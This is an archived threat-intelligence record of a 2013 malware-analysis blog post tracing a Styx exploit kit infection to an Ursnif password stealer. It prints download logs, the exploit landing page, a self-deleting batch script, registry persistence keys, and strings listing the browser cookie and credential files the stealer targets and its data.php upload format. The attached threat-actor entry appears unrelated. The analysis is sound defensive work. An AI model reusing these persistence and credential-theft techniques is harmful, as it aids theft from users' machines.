{
	"id": "f6ecdb4b-0eaf-46ff-b489-34293c5664dc",
	"created_at": "2026-04-06T00:17:24.848636Z",
	"updated_at": "2026-04-10T03:23:52.382746Z",
	"deleted_at": null,
	"sha1_hash": "2adc306b09b87e804b2c5dc6783ea46e705c7ccd",
	"title": "The infection of Styx Exploit Kit (Landing page: painterinvoice.ru + Payload: PWS/Ursnif Variant)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 470812,
	"plain_text": "The infection of Styx Exploit Kit (Landing page: painterinvoice.ru\r\n+ Payload: PWS/Ursnif Variant)\r\nPublished: 2013-02-03 · Archived: 2026-04-05 21:57:55 UTC\r\nInfection route:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nInfector: h00p:\r\nRedirector: h00p:\r\nDownloader1: h00p:\r\nLead to: (same path)/imJTuXe.jar\r\nDownloader2: h00p:\r\nPayload: h00p:\r\nInfectior hosts:\r\nInfector (hacked site): tropold.org (209.8.45.242)\r\nLanding Page : painterinvoice.ru (108.61.12.43)\r\nPayload (hacked site) : fuji-solar.co.jp (60.43.201.33)\r\nPoC:\r\nInfector:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n--2013-02-03 02:22:15-- h00p:\r\nResolving tropold.org... seconds 0.00, 209.8.45.242\r\nCaching tropold.org =\u003e 209.8.45.242\r\nConnecting to tropold.org|209.8.45.242|:80... seconds 0.00, connected.\r\n:\r\nGET /jerk.cgi?6 HTTP/1.0\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nHost: tropold.org\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 1 of 16\n\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n:\r\nHTTP/1.1 200 OK\r\nDate: Sat, 02 Feb 2013 19:03:31 GMT\r\nServer: Apache\r\nSet-Cookie: thlpg6=_1_; expires=Sun, 03-Feb-2013 19:03:31 GMT; path=/; domain=tr\r\nopold.org\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n:\r\n200 OK\r\nLength: unspecified [text/html]\r\nSaving to: `jerk.cgi@6.1 \"\r\n2013-02-03 02:22:15 (1.49 MB/s) - `jerk.cgi@6.1' saved [182]\"\r\n＜html＞＜frameset rows= \"100%\" ＞\r\n＜/frameset＞\r\n＜/html＞\r\nRedirectors:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n--2013-02-03 02:23:29-- h00p:\r\nB0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea\r\nResolving painterinvoice.ru... seconds 0.00, 108.61.12.43\r\nCaching painterinvoice.ru =\u003e 108.61.12.43\r\nConnecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.\r\n:\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 2 of 16\n\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\nGET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea H\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nHost: painterinvoice.ru\r\nHTTP request sent, awaiting response...\r\n:\r\nHTTP/1.0 302 Found\r\nSet-Cookie: PHPSESSID=2pt94m2itjr49i320maohs0r30; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nX-Powered-By: Application Error....\r\nServer: QRATOR\r\nLocation: h00p:\r\nContent-type: text/html\r\nContent-Length: 0\r\nConnection: keep-alive\r\nDate: Sat, 02 Feb 2013 17:27:06 GMT\r\n:\r\n302 Found\r\n:\r\nLocation: h00p:\r\nSkipping 0 bytes of body: [] done.\r\n--2013-02-03 02:23:30-- h00p:\r\nReusing existing connection to painterinvoice.ru:80.\r\n:\r\nGET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 3 of 16\n\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\nHost: painterinvoice.ru\r\n:\r\nHTTP/1.0 200 OK\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nX-Powered-By: Application Error....\r\nServer: QRATOR\r\nContent-Type: text/html\r\nX-Mode: HTML\r\nContent-Length: 490\r\nConnection: keep-alive\r\nDate: Sat, 02 Feb 2013 17:27:07 GMT\r\n:\r\n200 OK\r\nLength: 490 [text/html]\r\nSaving to: `index.html \"\r\n2013-02-03 02:23:31 (13.4 MB/s) - `index.html saved [490/490]\"\r\n＜html＞\r\n＜head＞\r\n＜title＞TTklldd＜/title＞\r\n＜/head＞\r\n＜body＞\r\n＜applet archive= \"imJTuXe.jar\" code= \"kobCA.Qbyka\" name= \"vNOArj\" ＞\r\n＜/applet＞\r\n＜script type= \"text/javascript\" src= \"rtoplsf.js\" ＞＜/script＞\r\n＜/body＞\r\n＜/html＞\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 4 of 16\n\n65\r\n66\r\n67\r\n68\r\n69\r\nDownloader:\r\n↑See the ISRonx04...607Atz/getmyfile.exe?o=1\u0026h=11, is a downloader scheme\r\nof this exploit kit. It forward you to the JAR download url:\r\n1 h00p:\r\nDownload...\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n--2013-02-03 02:26:40-- h00p:\r\nResolving painterinvoice.ru... seconds 0.00, 108.61.12.43\r\nCaching painterinvoice.ru =\u003e 108.61.12.43\r\nConnecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.\r\n:\r\nGET /spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/i\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nHost: painterinvoice.ru\r\nHTTP request sent, awaiting response...\r\n:\r\nHTTP/1.0 200 OK\r\nSet-Cookie: PHPSESSID=d8l9gc7g9vbg0poai41h97r7c6; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nX-Powered-By: Application Error....\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 5 of 16\n\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\nServer: QRATOR\r\nContent-Type: text/html\r\nX-Mode: HTML\r\nConnection: close\r\nDate: Sat, 02 Feb 2013 17:30:16 GMT\r\n:\r\n200 OK\r\nLength: unspecified [text/html]\r\nSaving to: `imJTuXe.jar \"\r\n2013-02-03 02:26:41 (14.5 KB/s) - `imJTuXe.jar saved [12996]\"\r\nExploitation\r\nThe target privilege:\r\nThe flood:\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 6 of 16\n\nCVE-2012-1723\r\nCVE-2012-4681\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 7 of 16\n\nThis JAR at Virus Total, URL --\u003e\u003e[HERE]\r\nSHA256: ca601ec85cc7bc2afa82384a1b832401af281e476021b1db59201bb8d0936211\r\nSHA1: e3f1b938ef96c139b948c6bd9cc69d7c2dec0643\r\nMD5: 9c4ca2083a2c4cd518897ab59df3a15c\r\nFile size: 12.7 KB ( 12996 bytes )\r\nFile name: imJTuXe.jar\r\nFile type: JAR\r\nTags: exploit jar cve-2012-1723 cve-2012-4681\r\nDetection ratio: 10 / 46\r\nAnalysis date: 2013-02-03 08:07:39 UTC ( 2 hours, 36 minutes ago )\r\nMalware names:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nDrWeb : Exploit.CVE2012-1723.13\r\nGData : Java:CVE-2012-1723-VT\r\nAntiVir : EXP/2012-1723.GE\r\nTrendMicro : HEUR_JAVA.EXEC\r\nMcAfee-GW-Edition : Exploit-CVE2012-1723.c\r\nAvast : Java:CVE-2012-1723-VT [Expl]\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 8 of 16\n\n7\r\n8\r\n9\r\n10\r\nESET-NOD32 : probably a variant of Java/Exploit.CVE-2012-1723.FR\r\nMcAfee : Exploit-CVE2012-1723.c\r\nIkarus : Java.CVE.2012\r\nSophos : Troj/JavaDl-NZ\r\nThe JAR resulted the below URL:\r\n1 h00p:\r\nAgain we met \"..0mMLQ/getmyfile.exe\" downloader, which now pointing to the\r\nbelow payload url:\r\n1 h00p:\r\nIt's still up there..(make the necessary warning though...)\r\nDownload log:\r\n1\r\n2\r\n3\r\n4\r\n5\r\nGET /date/dune.exe HTTP/1.0\r\nUser-Agent: MalwareMustDie! You are famous now!\r\nHost: fuji-solar.co.jp\r\nHTTP request sent, awaiting response...\r\n:\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 9 of 16\n\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\nHTTP/1.1 200 OK\r\nDate: Sat, 02 Feb 2013 17:20:04 GMT\r\nServer: Rapidsite/Apa\r\nLast-Modified: Sat, 02 Feb 2013 12:26:52 GMT\r\nETag: \"35dd625-37400-510d060c\"\r\nAccept-Ranges: bytes\r\nContent-Length: 226304\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/exe\r\n:\r\n200 OK\r\nRegistered socket 1896 for persistent reuse.\r\nLength: 226304 (221K) [application/exe]\r\n\"Saving to: `dune.exe\"\r\nPayload at Virus Total, url is here --\u003e\u003e[HERE]\r\nSHA256: 0e61ecd0aad87a72d36bc10288303292859a800d2237ac9c32755d9e455e87e2\r\nSHA1: a7344edd33d4bcd538fdba240c2996417a0d63b8\r\nMD5: a26ff2a7664aaa03d41a591fc71d2221\r\nFile size: 221.0 KB ( 226304 bytes )\r\nFile name: dune.exe\r\nFile type: Win32 EXE\r\nTags: peexe\r\nDetection ratio: 3 / 46\r\nAnalysis date: 2013-02-03 07:09:05 UTC ( 38 minutes ago )\r\nMalware Name:\r\n1\r\n2\r\n3\r\nTrendMicro-HouseCall : TROJ_GEN.F47V0202\r\nDrWeb : Trojan.KillProc.22029\r\nSymantec : WS.Reputation.1\r\n↑Low detection. It looks we will see many infection happened..\r\nI wrote the quick analysis on this malware in VT comment, with additional\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 10 of 16\n\ninformation below:\r\nAs per I wrote in VT comment, this malware killed explorer.exe \u0026\r\nstarted the new one, as per I reproduced below:\r\nHow this malware did it? and what for? below could be the answer:\r\nFirst, it creates: 1958718(RANDOM).bat in the current directory. PoC traces:\r\n1\r\n2\r\n\"WriteFile\" , \"C:\\Documents and Settings\\%USER%\\%DESKTOP%\\1958718.bat\" ,\r\n\"SUCCESS\" , \"Offset: 0, Length: 72\"\r\nAnd executed it with CMD command to re-run explorer \u0026 delete the malware files:\r\n1\r\n2\r\n3\r\n\"Process Create\" , \"C:\\WINDOWS\\system32\\cmd.exe\" , \"SUCCESS\" , \"PID: 2916,\r\nCommand line:\r\ncmd /c \" \"\" \"C:\\Documents and Settings\\%USER%\\%DESKTOP%\\1958718.bat\" \"\r\nWith the batch command below:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n(361): /sd %lu\r\n(363): %lu.bat \"\r\n(364): attrib -r -s -h %%1\r\n(365): del %%1\r\n(366): if exist %%1 goto %u\r\n(367): del %%0\r\n(369): %s\\explorer.exe\"\r\nThis act is to hide the real malware activities and to delete the\r\nmalware files from the PC after being executed.\r\nWhat had happened during the explorer.exe being terminated was:\r\nIt created C:\\WINDOWS\\system32\\fastinit.exe(RANDOM) (a self copy) \u0026 make it autostart\r\nin registry with setting key/values:\r\n1\r\n2\r\n\"CreateFile\" , \"C:\\WINDOWS\\system32\\fastinit.exe\" , \"SUCCESS\" , OpenResult: Created \"\r\n\" RegSetValue \",\" HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\helplist(RANDOM) \",\" SUCCESS\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 11 of 16\n\n3\r\nType: REG_SZ, Length: 66, Data: C:\\WINDOWS\\system32\\fastinit.exe\"\r\nNOTE: The malware choosed the name of file to be copied itself AFTER investigating\r\nwhat EXE files is actually exist in your PC and choosed one of them for the\r\ntarget to copy, PoC --\u003e\u003e[HERE]\r\nFurthermore the randomization also used to pick autostart registry key name,\r\nLike in this case was Windows\\CurrentVersion\\Run\\helplist, while in VT\r\nI detected \\Windows\\CurrentVersion\\Run\\autocnfg, while VT behavior test\r\nitself shows: \\Windows\\CurrentVersion\\Run\\blassmgr.\r\nThe rest of changes in registry is as per below:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\helplist\" , \"SUCCESS\" , \"Type: REG_SZ, Length:\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Personal\" , \"SUCCESS\" , \"Ty\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache\" , \"SUCCESS\" , \"Type:\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\{11948642-10a9-11e2-95b6-806d6172\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\{903f3d4c-6ae4-11e2-91fb-0012f0e9\r\n\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Documents\" , \"SUCCESS\"\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Desktop\" , \"SUCCESS\" , \"Typ\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass\" , \"SUCCESS\"\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName\" , \"SUCCESS\"\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet\" , \"SUCCESS\"\r\nSince the malware binary file was encrypted so we can't see much of it,\r\nif you see the binary in the section .text it will appear like this:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nFile: dune.exe; Section: .text\r\nEncrypted part:\r\n0x0004FF 0x0004FF ＞====\r\n0x000515 0x000515 ====6?y＞6?y\r\n0x00052B 0x00052B 5=Hh2\r\n0x000531 0x000531 2====a\r\n0x00055B 0x00055B c＞====\r\n0x000582 0x000582 ＞?Ay=|=\r\n0x0005A9 0x0005A9 Rn=y=\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 12 of 16\n\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n0x0005AF 0x0005AF 35Ln=y=\r\n0x0005E0 0x0005E0 3＞====\r\n0x000610 0x000610 ===g===\r\n0x00062D 0x00062D %,A＞h\r\n0x000645 0x000645 a5===\r\n0x0006BD 0x0006BD n====g==5==\r\n: : :\r\n0x03646F 0x03646F R |=A3\r\n0x03662A 0x03662A %H2%n?\r\n0x036642 0x036642 A57 ＞\r\n0x03668E 0x03668E ＞6=dg＞\r\nThe complete list is here --\u003e\u003e[HERE]\r\nbut after being decrypted we start to understand how it works better.\r\nThe section .rdata will appear contains the some values.\r\nWe can see the list of calls is here --\u003e\u003e[HERE]\r\nAnd the breakdown of the stealer++ activities as per below:\r\nSome comment of malware coder with the mis-spelled words:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n.rdata:100124E4 00000010 C Sart Load DLL\\r\\n\r\n.rdata:100124F4 0000001D C Loading DLL: \\\"%s\\\" size: %d\\r\\n\r\n.rdata:10012514 00000012 C Start Write DLL\\r\\n\r\n.rdata:10012528 00000016 C DLL load status: %u\\r\\n\r\n.rdata:10012658 0000001C C Started Soccks status {%u\\n}\r\n.rdata:10012674 00000014 C Get info status %u\\n\r\n.rdata:10012688 00000017 C Command received \\\"%s\\\"\\n\r\n.rdata:100126A0 0000000C C MakeScreen\\n\r\nSo it supposed to connect to internet...\r\n1\r\n2\r\n3\r\n.rdata:10012C64 00000008 C http:\r\n.rdata:10012C6C 00000009 C https:\r\n.rdata:10012A94 00000006 C Host:\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 13 of 16\n\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n.rdata:10012A9C 0000000C C User-Agent:\r\n.rdata:10012AA8 00000010 C Content-Length:\r\n.rdata:10012AB8 00000013 C Transfer-Encoding:\r\n.rdata:10012BDC 0000000A C text/html\r\n.rdata:10012BE8 00000006 C image\r\n.rdata:10012BF0 0000000A C Referer:\r\n.rdata:10012BFC 0000001A C URL: %s\\r\\nuser=%s\\r\\npass=%s\r\nWhile these shows what it grabs.. (Ursnif trade mark)\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n.rdata:10012CA4 00000005 C @ID@\r\n.rdata:10012CB0 00000008 C @GROUP@\r\n.rdata:10012CB8 00000007 C grabs=\r\n.rdata:10012CC0 00000008 C NEWGRAB\r\n.rdata:10012CC8 0000000B C SCREENSHOT\r\n.rdata:10012CD4 00000008 C PROCESS\r\n.rdata:10012CDC 00000007 C HIDDEN\r\n.rdata:10012CE4 00000005 C @%s@\r\n.rdata:10012CEC 00000005 C http\r\n.rdata:10012CF4 00000005 C POST\r\n.rdata:10012CFC 0000000A C URL: %s\\r\\n\r\n..or this one will show you better...\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n.rdata:10012948 0000001D C cmd /C \\\"systeminfo.exe \u003e %s\\\"\r\n.rdata:10012968 0000001B C failed start sysinfo - %u\\n\r\n.rdata:10012984 0000001D C cmd /C \\\"echo -------- \u003e\u003e %s\\\"\r\n.rdata:100129A4 00000021 C cmd /C \\\"tasklist.exe /SVC \u003e\u003e %s\\\"\r\n.rdata:100129C8 0000001C C failed start tasklist - %u\\n\r\n.rdata:100129E4 0000001F C cmd /C \\\"driverquery.exe \u003e\u003e %s\\\"\r\n.rdata:10012A04 0000001A C failed start driver - %u\\n\r\n.rdata:10012A20 0000005B C cmd /C \\\"reg.exe query \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 14 of 16\n\n9 .rdata:10012A7C 00000015 C failed get reg - %u\\n\r\nThe credentials targetted....\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n0x010F44 \\Mozilla\\Firefox\\Profiles\\\r\n0x010F7C cookies.sqlite\r\n0x010F9C cookies.sqlite-journal\r\n0x010FCC \\Macromedia\\Flash Player\\\r\n0x011000 *.sol\r\n0x01100C *.txt\r\n0x011018 \\sols\r\n0x011024 \\cookie.ie\r\n0x01103C \\cookie.ff\r\n0x011678 image/gif\r\nWe'll see usage of PHP form on the server side:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n.rdata:100126E8 00000005 C form\r\n.rdata:100126F0 0000004B C /data.php?version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\n.rdata:10012758 0000007B C version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026crc=%08X\u0026wake=%u\u0026prjct=%d\u0026a\r\n.rdata:100127D8 0000000D C /c%s.php?%s=\r\n:\r\n.rdata:10012E10 00000042 C Content-Disposition: form-data; name=\\\"upload_file\\\"; filename=\\\"%s\\\"\r\n.rdata:10012E58 00000048 C Content-Disposition: form-data; name=\\\"upload_file\\\"; filename=\\\"%.4u.%lu\\\"\r\n.rdata:10012EA0 00000027 C --------------------------%04x%04x%04x\r\n.rdata:10012EC8 0000002F C Content-Type: multipart/form-data; boundary=%s\r\n.rdata:10012EF8 0000000B C \\r\\n--%s--\\r\\n\r\n.rdata:10012F04 00000027 C Content-Type: application/octet-stream\r\n.rdata:10012F2C 00000011 C --%s\\r\\n%s\\r\\n%s\\r\\n\\r\\n\r\nSetting target directory for grabbing sruff\r\n1\r\n2\r\n.rdata:100128A4 0000001B C .set DiskDirectory1=\\\"%s\\\"\\r\\n\r\n.rdata:100128C0 00000019 C .set CabinetName1=\\\"%s\\\"\\r\\n\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 15 of 16\n\n3\r\n4\r\n5\r\n.rdata:100128DC 00000007 C \\\"%s\\\"\\r\\n\r\n.rdata:100128EC 0000001B C .set DestinationDir=\\\"%S\\\"\\r\\n\r\n.rdata:1001290C 00000007 C \\\"%S\\\"\\r\\n\r\nAnd making CAB archive of the target..\r\n1 .rdata:10012914 00000014 C makecab.exe /F \\\"%s\\\r\nI thank you @EP_X0FF kernel mode for the very good help solving this mistery.\r\nIt is a PWS variant alright, with the malware name of Trojan Ursnif.\r\nThe complete list of the .RDATA section is here--\u003e\u003e[HERE]\r\nSamples\r\n*) We share samples for research purpose \u0026 raising detection ratio of this infection.\r\nInfection sample set --\u003e\u003e[HERE]\r\nThe malware complete recorded process can be download in archive here --\u003e\u003e[HERE]\r\nThank's to @kafeine for the infection info.\r\n#MalwareMustDie!\r\nSource: http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html"
	],
	"report_names": [
		"the-infection-of-styx-exploit-kit.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434644,
	"ts_updated_at": 1775791432,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2adc306b09b87e804b2c5dc6783ea46e705c7ccd.pdf",
		"text": "https://archive.orkl.eu/2adc306b09b87e804b2c5dc6783ea46e705c7ccd.txt",
		"img": "https://archive.orkl.eu/2adc306b09b87e804b2c5dc6783ea46e705c7ccd.jpg"
	}
}